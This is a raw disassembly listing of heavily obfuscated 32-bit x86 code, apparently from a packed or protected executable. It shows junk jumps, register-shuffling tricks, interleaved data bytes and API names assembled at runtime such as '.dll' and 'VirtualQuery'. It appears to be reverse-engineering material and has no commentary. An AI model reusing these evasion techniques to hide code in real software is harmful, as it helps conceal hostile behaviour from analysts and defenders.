		jmp	loc_48DB0F
; ---------------------------------------------------------------------------
		align 4
		dd 8C0C100h, 6472C881h,	0E881B30Fh, 0B20BFE0Dh,	0C7BDBB53h
		dd 4DE90048h
		db 0E6h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E1A3:				; CODE XREF: eu81y7qg:0048D4C4j
		mov	byte ptr [ecx],	0FFh
		pop	ecx
		push	offset dword_48D5F4
		jmp	loc_4899B4
; ---------------------------------------------------------------------------
		align 2

loc_48E1B2:				; CODE XREF: eu81y7qg:0048A8A5p
					; sub_48DE75+6E3j
		xchg	edx, [esp+8+var_8]
		xchg	eax, [esp+8+var_8]
		mov	edx, eax
		pop	eax
		jmp	near ptr dword_489A64+46h
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48E1C1:				; CODE XREF: sub_48DE75+51Ej
		retn
; ---------------------------------------------------------------------------
		dw 0EE81h
		dd 9302491Ch, 0FFB34AE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48E1CD:				; CODE XREF: sub_48DE75:loc_48BECEp
		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [edi],	87h
		xchg	esi, [esp-4+arg_0]
		mov	edi, esi
		pop	esi
		jmp	loc_489AB9
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48E1E1:				; CODE XREF: eu81y7qg:loc_48EE8Cj
		call	sub_48B528
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48E1E8:				; CODE XREF: sub_48DE75+460j
		jmp	near ptr dword_48A814+40h
; ---------------------------------------------------------------------------

loc_48E1ED:				; CODE XREF: eu81y7qg:0048B1E0j
		jmp	locret_48E58C
; ---------------------------------------------------------------------------

locret_48E1F2:				; CODE XREF: sub_48DE75:loc_48E62Cj
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48E1F5:				; CODE XREF: sub_48DE75+4AEj
		jmp	nullsub_575
; ---------------------------------------------------------------------------
		align 4

loc_48E1FC:				; CODE XREF: sub_48DE75-1C00j
		add	esi, 78965F64h
		jmp	loc_489B67
; ---------------------------------------------------------------------------
		align 4
		dd 2A13CA68h, 0C081582Ah, 0AA438ECFh, 6ED6E081h, 0F081BCD8h
		dd 70F01F72h, 7FB3C081h, 0BB53EF84h, 48D7C2h, 0FFD7ACE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48E232:				; CODE XREF: sub_48DE75:loc_48DFDCj
		xchg	ebp, [esp-18h+arg_14]
		mov	ebx, 4898B2h
		jmp	near ptr byte_48B779+2
; ---------------------------------------------------------------------------
		align 10h
		dd 0E9D00B00h, 0FFFFF251h
; ---------------------------------------------------------------------------

loc_48E248:				; CODE XREF: eu81y7qg:0048D640j
		pop	edi
		xor	edi, 0C68F2449h
		rol	edi, 2
		jb	near ptr dword_48BBF8+8

loc_48E258:				; CODE XREF: eu81y7qg:0048CDB8j
		jmp	loc_48B5A0
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C1h
		dd 0F8E909C8h, 0FFFFFCh
		db 0
; ---------------------------------------------------------------------------

loc_48E269:				; CODE XREF: eu81y7qg:00489C68j
		xchg	esi, [esp-1Ch+arg_18]
		pop	esi
		mov	dword ptr [ebp-10h], 6C6C642Eh
		xor	eax, eax
		jmp	loc_48E084
; ---------------------------------------------------------------------------

loc_48E27B:				; CODE XREF: eu81y7qg:loc_48DA60j
		push	esi
		push	99BED13Fh
		pop	esi
		or	esi, 688F1C6Ah
		xor	esi, 0FCD837EEh
		jmp	loc_48B501
; ---------------------------------------------------------------------------
		db 87h
		dd 0D973E92Ah
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E29A:				; CODE XREF: sub_48DE75+73Cj
		push	ebx
		push	769F11D5h
		pop	ebx
		rol	ebx, 17h
		and	ebx, 0D406D84h
		add	ebx, 0F8488C4Ah
		jmp	loc_48AD56
; ---------------------------------------------------------------------------

locret_48E2B5:				; CODE XREF: eu81y7qg:00489B0Ej
		retn
; ---------------------------------------------------------------------------
		dw 36E9h
		dd 0FFFFC6h
		dd 5224348Ah, 0DF31E89Ch, 0FFFFh ; DATA	XREF: sub_48EC13+Ao
; ---------------------------------------------------------------------------

locret_48E2C8:				; CODE XREF: eu81y7qg:loc_48D45Fj
		retn
; ---------------------------------------------------------------------------

loc_48E2C9:				; CODE XREF: eu81y7qg:0048B574j
					; eu81y7qg:loc_48D3E7p
		xchg	eax, [esp-18h+arg_14]
		pop	eax
		push	4307A651h
		xchg	ecx, [esp-18h+arg_14]
		jmp	loc_48E1E8
; ---------------------------------------------------------------------------
		align 4

locret_48E2DC:				; CODE XREF: eu81y7qg:0048A15Dj
		retn
; ---------------------------------------------------------------------------
		align 2
		dw 0C6E8h
		db 5, 4	dup(0)
; ---------------------------------------------------------------------------

loc_48E2E5:				; CODE XREF: sub_48ECD0+Cj
		jmp	loc_48D3D4
; ---------------------------------------------------------------------------

loc_48E2EA:				; CODE XREF: eu81y7qg:0048C5CBj
		jmp	nullsub_604
; ---------------------------------------------------------------------------
		not	ebp
		push	200399FAh

loc_48E2F6:				; CODE XREF: sub_48CF7E:loc_48D8ECj
		push	esi
		mov	esi, edx
		xchg	esi, [esp-10h+arg_C]
		jmp	loc_48A2F9
; ---------------------------------------------------------------------------
		align 2

loc_48E302:				; CODE XREF: eu81y7qg:loc_48A69Cj
		jnz	loc_48BE5F
; ---------------------------------------------------------------------------
		dd 0EAC10000h, 59F08B10h, 0B19A8E0Fh, 13E9FFFFh
		db 0DDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E31B:				; CODE XREF: sub_48DE75:loc_489C56j
		push	ebp
		mov	ebp, ecx
		push	offset sub_48CA30
		jmp	loc_48E1F5
; ---------------------------------------------------------------------------
		dd 0FFDC8EE8h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48E32E:				; CODE XREF: eu81y7qg:0048A14Fj
		jbe	loc_48AE38
		xchg	ebx, [esp+0]
		pop	ebx
		mov	dword ptr [ebp-14h], 516C6175h
		mov	dword ptr [ebp-10h], 79726575h
		call	sub_48D2B3
		cdq
		jmp	loc_48BB7F
; ---------------------------------------------------------------------------
		align 2
word_48E352	dw 1C87h		; DATA XREF: sub_48D33Eo
		dd 0F0685B24h, 555A91A6h, 9CE9EA8Bh, 0FFFFC6h
		db 0
byte_48E365	db 68h,	8Eh, 9Bh	; DATA XREF: eu81y7qg:0048AA35o
		dd 0B7E90048h, 0FFFFCEh, 0E4F08100h, 8163F631h,	9F4657F8h
		dd 0CAE5E9ECh, 0E900FFFFh, 0FFFFDA9Eh, 0FFB90AE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48E38E:				; CODE XREF: sub_48DE75:loc_48BBD8j
					; eu81y7qg:0048C378p
		push	offset byte_48DDA1
		jmp	locret_48E1C1
; ---------------------------------------------------------------------------
		dd 870F0000h, 0FFFFC8D4h
; ---------------------------------------------------------------------------

loc_48E3A0:				; CODE XREF: sub_48EA14:loc_489C0Fj
		add	edi, 1DA269h
		push	offset loc_48C152
		jmp	loc_48DC9F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E3B2:				; CODE XREF: sub_48DE75-4605j
		jo	loc_48C20F
		js	loc_48CD05
		test	ecx, 0E5B5313Fh
		jmp	loc_48BA82
; ---------------------------------------------------------------------------
		sub	esi, edi
		rol	eax, 7
		jmp	sub_48D968
; ---------------------------------------------------------------------------
		align 4
dword_48E3D4	dd 48C1F168h, 0DF6AE900h ; DATA	XREF: sub_48B80F:loc_48B60Bo
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48E3DF:				; CODE XREF: eu81y7qg:0048CECFj
		jnz	loc_489D04
		xchg	ebx, [esp+4+var_4]
		pop	ebx

loc_48E3E9:				; CODE XREF: sub_48A765+4j
		test	eax, ebx
		call	sub_48AE52
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E3F1:				; CODE XREF: sub_48DE75+6D8j
		jmp	loc_48D93E
; ---------------------------------------------------------------------------

loc_48E3F6:				; CODE XREF: eu81y7qg:0048C028j
		jmp	near ptr loc_48C942+1
; ---------------------------------------------------------------------------
		align 4

loc_48E3FC:				; CODE XREF: eu81y7qg:0048BE4Bp
		xchg	ecx, [esp+0]
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		mov	ebp, esp
		jmp	loc_4897D9
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E40D:				; CODE XREF: eu81y7qg:loc_48B00Cj
		mov	ecx, [ecx]

loc_48E40F:				; DATA XREF: eu81y7qg:0048A6F2o
		pushf
		push	offset word_48C476
		jmp	loc_48D8AF
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+8+var_8]
		push	ecx
		mov	ecx, esi
		push	48DCB0h
		jmp	nullsub_613
; ---------------------------------------------------------------------------

loc_48E42D:				; CODE XREF: sub_48A315:loc_48BCD4j
		pop	esi
		and	esi, 0E9FBA2F9h
		xor	esi, 48169E91h
		add	esi, 0B73A6A67h
		jmp	loc_48CB00
; ---------------------------------------------------------------------------
		align 2

loc_48E446:				; CODE XREF: eu81y7qg:loc_48B11Dj
		add	eax, ebp
		add	eax, 384A563Dh

loc_48E44E:				; DATA XREF: eu81y7qg:loc_48AC79o
		popf
		push	offset loc_48E56E
		jmp	near ptr dword_489BC0+0Eh
; ---------------------------------------------------------------------------
		db 2 dup(0), 1Bh
		dd 0C6CAE9EAh, 0FFFFh, 0CCBBF381h, 0C381C308h, 18086A84h
		dd 2BEACB81h, 0C3811335h, 0A8C0D004h, 397E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48E483:				; CODE XREF: sub_48C693-312Bj
		push	0F70244D3h
		pop	ecx
		rol	ecx, 0Fh
		or	ecx, 996409CDh
		jmp	loc_48CA65
; ---------------------------------------------------------------------------
		align 4
		pop	large dword ptr	fs:0
		call	near ptr sub_48E917
		add	[ecx-23264B07h], al
		cwde
		jmp	loc_489C74
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E4B1:				; CODE XREF: sub_48DE75-1E7Dj
		or	edi, 297DFD56h
		add	edi, 0EEA22185h
		add	edi, ebp
		push	eax
		push	691113BDh
		pop	eax
		sub	eax, 961A659Bh
		add	eax, 3EE93263h
		jmp	loc_48DD81
; ---------------------------------------------------------------------------
		align 4
		dd 0EAE3850Fh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48E4DF:				; CODE XREF: eu81y7qg:0048D8E7j
		jmp	loc_48981A
; ---------------------------------------------------------------------------
		dd 12CBC100h, 3978FA81h, 0C3E90798h, 0FFFFEAh, 7E18100h
		dd 0E94F5437h, 0FFFFF00Bh
; ---------------------------------------------------------------------------

locret_48E500:				; CODE XREF: eu81y7qg:0048B0A4j
		retn
; ---------------------------------------------------------------------------
		db 0E9h, 7Bh, 0D9h
		dd 0FFFFh
; ---------------------------------------------------------------------------

loc_48E508:				; CODE XREF: sub_48AC21+5j
		jmp	loc_48BFE1
; ---------------------------------------------------------------------------

loc_48E50D:				; CODE XREF: eu81y7qg:0048AB41j
		jmp	nullsub_598
; ---------------------------------------------------------------------------
		align 4
		dd 0A66DF881h, 47E93C50h, 0FFFFD7h, 4FE9318Bh, 0FFFFB1h
		db 0
; ---------------------------------------------------------------------------

locret_48E529:				; CODE XREF: sub_48DE75:loc_48E065j
		retn
; ---------------------------------------------------------------------------
		dw 0B3E9h
		dd 0FFFFE2h
; ---------------------------------------------------------------------------

loc_48E530:				; CODE XREF: sub_48AC5D+Fj
		jmp	loc_48EE72
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48E537:				; CODE XREF: sub_48E7D7-41AAj
		retn
; ---------------------------------------------------------------------------
		dd 0B6E9FE33h, 0FFFFF6h
		db 0
; ---------------------------------------------------------------------------

loc_48E541:				; CODE XREF: eu81y7qg:loc_48E84Ej
		mov	byte ptr [ecx],	87h
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx

loc_48E54A:				; CODE XREF: eu81y7qg:00489B24j
		rol	eax, 1Fh
		jmp	loc_48E3F1
; ---------------------------------------------------------------------------
		adc	esi, 5A1655Dh
		jmp	loc_48E1B2
; ---------------------------------------------------------------------------
		push	ecx
		jmp	loc_48C258
; ---------------------------------------------------------------------------
		align 4

loc_48E564:				; CODE XREF: sub_48C27A+1550j
		push	offset loc_48B8CB
		jmp	nullsub_592
; ---------------------------------------------------------------------------

loc_48E56E:				; DATA XREF: sub_48DE75+5DAo
		push	esi
		mov	esi, eax
		xchg	esi, [esp-1Ch+arg_18]
		push	offset sub_48BA3A
		jmp	loc_489968
; ---------------------------------------------------------------------------
		dw 8100h
		dd 7196D7E7h, 0B508E9B2h, 0FFFFh
; ---------------------------------------------------------------------------

locret_48E58C:				; CODE XREF: sub_48DE75:loc_48E1EDj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E58F:				; CODE XREF: eu81y7qg:0048C30Aj
		jmp	loc_48A072
; ---------------------------------------------------------------------------
		dd 4870000h, 0F3815824h, 2400810h, 0FF241C87h, 45C0C015h
		dd 0CED4E900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E5AE:				; CODE XREF: sub_48C27A:loc_48A44Dj
					; sub_48C27A+17B5j
		lodsb
		add	edx, eax
		jmp	loc_48E29A
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E5B7:				; CODE XREF: eu81y7qg:0048C706j
		xchg	edx, [esp-8+arg_4]
		mov	ebp, esp
		push	48B9D1h
		jmp	near ptr dword_48A0AC+4
; ---------------------------------------------------------------------------
		dw 8100h
; ---------------------------------------------------------------------------
		jmp	fword ptr [edi]
; ---------------------------------------------------------------------------
		dw 5F08h
		dd 0DE63E9D9h, 0E89DFFFFh, 0FFFFBBBAh, 1AE90000h, 0FFFFCFh
; ---------------------------------------------------------------------------

loc_48E5E0:				; CODE XREF: eu81y7qg:0048D77Bj
		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		mov	eax, [eax]
		jmp	loc_48D395
; ---------------------------------------------------------------------------
		align 4
		dd 0F9850F00h, 68FFFFD5h, 48B013h, 0FFD33CE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48E5FD:				; CODE XREF: sub_48BD75+2CC0j
		push	offset byte_48C04F
		jmp	nullsub_568
; ---------------------------------------------------------------------------
		align 4
		sub	edi, esi
		jmp	sub_48A895
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48E611:				; CODE XREF: sub_48CA8B-61j
		mov	byte ptr [ecx],	87h
		pop	ecx
		push	offset word_48CD4A
		jmp	nullsub_589
; ---------------------------------------------------------------------------
byte_48E61F	db 81h			; DATA XREF: eu81y7qg:0048D574o
		dd 0B1E7DDC6h, 0F3B5E812h, 0FFFFh
; ---------------------------------------------------------------------------

loc_48E62C:				; CODE XREF: sub_48EC13-46F9j
		jmp	locret_48E1F2
; ---------------------------------------------------------------------------
		align 2

loc_48E632:				; CODE XREF: sub_48BE6F-297Ej
		jmp	nullsub_556
; ---------------------------------------------------------------------------

loc_48E637:				; CODE XREF: sub_48DE75+Aj
		mov	byte ptr [esi],	9Dh
		pop	esi
		add	eax, edi
		push	offset loc_489DB3
		jmp	nullsub_478
sub_48DE75	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

loc_48E648:				; CODE XREF: eu81y7qg:0048D5B9j
		xchg	edx, [esp]
		pop	edx
		push	esi
		mov	esi, ebx
		xchg	esi, [esp]
		push	7ADF695Bh
		jmp	loc_48B457
; ---------------------------------------------------------------------------
		dd 58240487h, 51243487h, 0FFE21AE8h
; ---------------------------------------------------------------------------

loc_48E668:				; DATA XREF: eu81y7qg:0048BD6Ao
		jmp	fword ptr [eax+3Fh]
; ---------------------------------------------------------------------------
		stosb
		sbb	ah, ds:18F08158h
		mul	byte ptr [ebx]
		or	eax, [ecx+5B3246E0h]
		dec	edi
		jmp	loc_48B113
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E682:				; CODE XREF: eu81y7qg:loc_48BEC2j
		add	ebx, 3BE682B6h
		rol	ebx, 6
		jnb	loc_48A2A0
		jmp	locret_48B383
; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 0FFFFEF95h, 48F3D281h, 0C52B8532h, 0FFBBF7E9h
		db 0FFh, 0C3h, 0
; ---------------------------------------------------------------------------

loc_48E6AB:				; CODE XREF: eu81y7qg:0048AC7Ej
		jmp	near ptr dword_489574+2Dh
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D511

loc_48E6B2:				; CODE XREF: sub_48D511+Aj
		push	48A67Dh
		jmp	near ptr loc_489973+1
; END OF FUNCTION CHUNK	FOR sub_48D511
; ---------------------------------------------------------------------------
		dd 0BE98E800h, 0B800FFFFh, 45C15Ch
; ---------------------------------------------------------------------------

loc_48E6C8:				; CODE XREF: eu81y7qg:loc_48DC6Cj
		jnz	loc_48BAA0
		jno	loc_48C42B
		mov	edx, [eax]
		push	offset dword_48D918
		jmp	near ptr dword_48A7B0+2
; ---------------------------------------------------------------------------
		dd 0C5426800h, 90E90048h, 1, 0E912C9C1h, 0FFFFE4A0h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48E6F5:				; CODE XREF: sub_48DD69-1A43j
		jnz	loc_48C9D4
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------

loc_48E6FD:				; CODE XREF: eu81y7qg:0048EBC2j
		jmp	near ptr loc_48E9D1+1
; ---------------------------------------------------------------------------
		dw 0D4E9h
; ---------------------------------------------------------------------------
		mov	eax, 99E9FFFFh
		sar	edi, 0FFh
		add	[ecx-79D3583Bh], al
		das
		ror	ecx, 1Eh
		jmp	loc_48C9D4
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48E71D	proc near		; CODE XREF: sub_48C27A+154Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048A8AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA3D SIZE 00000015 BYTES

		xchg	eax, [esp-4+arg_0]
		pop	eax
		push	0C0FC56CAh
		pop	ecx
		or	ecx, 0B1C09B98h
		jmp	loc_48DA3D
sub_48E71D	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_596. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 0FFCBBEE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E73B:				; CODE XREF: eu81y7qg:0048AC90j
		jmp	loc_48DAB7
; ---------------------------------------------------------------------------
		dd 34875B00h, 0F632E924h, 34E8FFFFh, 68000005h,	48A276h
		dd 0FFC789E9h, 0F0000FFh, 0FFEE0B8Dh, 0F0000FFh, 0FFF0048Dh
		dd 0D64CE9FFh, 0C300FFFFh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B3C5

loc_48E771:				; CODE XREF: sub_48B3C5+Fj
		jmp	loc_48A446
; END OF FUNCTION CHUNK	FOR sub_48B3C5
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48E778	proc near		; CODE XREF: sub_489492+Dp
					; eu81y7qg:0048B1CDj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00489D16 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	eax
		push	0CAF899F8h
		xchg	ebp, [esp+4+var_4]
		mov	eax, ebp
		pop	ebp
		sub	eax, 0A2BFFDA4h
		jmp	loc_489D16
sub_48E778	endp

; ---------------------------------------------------------------------------
		align 4
dword_48E794	dd 0FFDF5AE8h, 0D8E881FFh, 81DD54E6h, 0E3B4A5C1h, 0D96DE9F2h
					; DATA XREF: sub_48DE75:loc_48CE21o
					; sub_48D58F+5o
		dd 1C87FFFFh, 0B8505B24h, 48B17Ah, 0FFE8B4E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
		retn
; ---------------------------------------------------------------------------

loc_48E7BB:				; DATA XREF: sub_48EC13:loc_48A515o
		mov	byte ptr [ecx],	87h
		xchg	esi, [esp]
		mov	ecx, esi
		pop	esi
		jmp	loc_48E168
; ---------------------------------------------------------------------------
		db 9Ch,	0Fh, 8Dh
		dd 0FFFFD6C9h, 0FFDA4DE9h
		db 0FFh, 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48E7D7	proc near		; CODE XREF: eu81y7qg:0048EED0p

; FUNCTION CHUNK AT 0048A1AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A615 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048B9F6 SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	817F138Ch
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		and	ebx, 0C5C3A718h
		jmp	loc_48B9F6
sub_48E7D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48E7F3:				; CODE XREF: sub_48CF7E-1F7Bj
		jmp	loc_48D8EC
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_564. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 81h
		dd 5208AE9h, 37C18110h,	81E0897Fh, 0B4A08E9h, 0EEC1818Dh
		dd 876C9494h, 0C3240Ch,	0FFD69FE9h, 0FE7C1FFh, 0FFD6B6E9h
		dd 0C8700FFh, 68565924h, 0C37FDB9Ah, 0BA7AE95Eh, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_589. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_48E839	proc near		; CODE XREF: sub_48E917+4p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		add	esp, 4
		push	936AB300h
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4894CD
sub_48E839	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_586. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48E84E:				; CODE XREF: eu81y7qg:0048ABE1j
		jmp	loc_48E541
; ---------------------------------------------------------------------------
		align 4

loc_48E854:				; CODE XREF: eu81y7qg:00489DA7p
					; eu81y7qg:0048D30Ej
		xchg	ebx, [esp]
		pop	ebx
		add	eax, 1111B8AFh
		call	sub_48B769
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------

loc_48E865:				; CODE XREF: eu81y7qg:0048CAACj
		jmp	near ptr dword_489508+1Bh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48E86A:				; CODE XREF: sub_48B559-14ECj
		jmp	loc_48BA0F
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		align 10h
		dd 0A1846800h, 0A7E90048h, 0C3FFFFE2h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48E87E:				; CODE XREF: sub_48DE75-2AF8j
		jmp	nullsub_599
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B8B2

loc_48E885:				; CODE XREF: sub_48B8B2:loc_48BC06j
		mov	dword ptr [ebp-4], 1
		push	0CD0BE9A3h
		call	loc_48E156
; END OF FUNCTION CHUNK	FOR sub_48B8B2
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C515

loc_48E897:				; CODE XREF: sub_48C515+6j
		jmp	loc_48B82E
; END OF FUNCTION CHUNK	FOR sub_48C515
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48E89C:				; CODE XREF: sub_48AEB5-14ACj
		jmp	loc_48B172
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E8A3:				; CODE XREF: eu81y7qg:0048D525j
		or	ecx, 0CD493C14h

; =============== S U B	R O U T	I N E =======================================



sub_48E8A9	proc far
		xchg	edx, [esp+0]
		xchg	eax, [esp+0]
		mov	edx, eax
		jmp	loc_48DEC0
sub_48E8A9	endp

; ---------------------------------------------------------------------------
		align 4

loc_48E8B8:				; CODE XREF: eu81y7qg:0048CC28j
		sub	esi, 939679E7h
		jb	near ptr dword_48B0E8+15h
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E8C6:				; CODE XREF: eu81y7qg:0048EDF0j
		jmp	near ptr dword_489668+56h
; ---------------------------------------------------------------------------
		db 0Fh
		dd 3458Bh, 0F83EE900h, 8100FFFFh, 0EA4C1DF0h, 0EF46E9BFh
		dd 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_612. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E8E7:				; CODE XREF: eu81y7qg:0048D0C9j
		jmp	loc_48DDCD
; ---------------------------------------------------------------------------
		dd 24148700h, 87C0815Ah, 8BF83C24h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B3C5

loc_48E8F9:				; CODE XREF: sub_48B3C5:loc_48A448j
		push	offset word_48C7FE
		jmp	loc_48B4FA
; END OF FUNCTION CHUNK	FOR sub_48B3C5
; ---------------------------------------------------------------------------
		align 4
		dd 5CC38100h, 689E71DAh, 489713h, 0FFADFDE9h
		db 0FFh, 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48E917	proc far		; CODE XREF: sub_48DE75+62Ap

; FUNCTION CHUNK AT 0048B33F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0048EE34 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_48E839

loc_48E920:				; CODE XREF: eu81y7qg:loc_48D0BBj
		jmp	loc_48B33F
sub_48E917	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2

loc_48E926:				; CODE XREF: eu81y7qg:0048C72Cj
		jmp	loc_4895CD
; ---------------------------------------------------------------------------
		align 4
		dd 0F78BE900h, 0FFFFh
; ---------------------------------------------------------------------------

locret_48E934:				; CODE XREF: eu81y7qg:0048D8C5j
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48CFEF

loc_48E936:				; CODE XREF: sub_48CFEF+12j
		jmp	loc_48EBA6
; END OF FUNCTION CHUNK	FOR sub_48CFEF
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFAE2Dh
		db 2 dup(0)
word_48E942	dw 0C168h		; DATA XREF: eu81y7qg:0048D8C0o
		dd 5A2532A6h, 28A9E281h, 0EA81ED2Fh, 81C85F3Ah,	0FFC197E9h
		dd 0A32E68FFh, 81588779h, 67BE5FC8h, 7BE88158h,	0E923316Bh
		dd 0FFFFCF2Ch, 1B8B0000h, 48BA7A68h, 0B7E4E900h, 0FFFFh
; ---------------------------------------------------------------------------

loc_48E980:				; CODE XREF: eu81y7qg:0048C9F7j
					; DATA XREF: sub_48A8BE+733o
		stc
		or	al, 24h
		jmp	loc_48DC45
; ---------------------------------------------------------------------------
		dd 0EF48E900h, 0FFFFh, 0E900C3h
		db 0B3h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E997:				; CODE XREF: eu81y7qg:0048B8EAj
		call	sub_48BAD9
		jmp	loc_48DEB3
; ---------------------------------------------------------------------------
		db 0E8h, 6Ah, 0B4h
		dd 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B80F

loc_48E9A8:				; CODE XREF: sub_48B80F+19j
		jmp	loc_48B60B
; END OF FUNCTION CHUNK	FOR sub_48B80F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48E9AF:				; CODE XREF: eu81y7qg:0048B2B4j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E9B2:				; CODE XREF: eu81y7qg:00489D10j
		jmp	locret_48AD01
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48E9EE

loc_48E9B8:				; CODE XREF: sub_48E9EE:loc_48BBD1j
		mov	word ptr [eax+esi+64FFFFACh], es
		pop	large dword ptr	ds:0
		call	sub_48AEB5

loc_48E9CA:				; CODE XREF: eu81y7qg:0048DD47j
		add	cl, ch
		xlat
		mov	dl, 0FFh
		inc	dword ptr [eax]

loc_48E9D1:				; CODE XREF: eu81y7qg:loc_48E6FDj
		add	[edi-75h], bl
		add	[ebp-47639764h], bl
		cmp	ch, dl
		pop	edx
		jmp	loc_48AC9C
; END OF FUNCTION CHUNK	FOR sub_48E9EE
; ---------------------------------------------------------------------------
		align 4
		mov	edx, 0E237030Bh
		jmp	loc_48BD93

; =============== S U B	R O U T	I N E =======================================



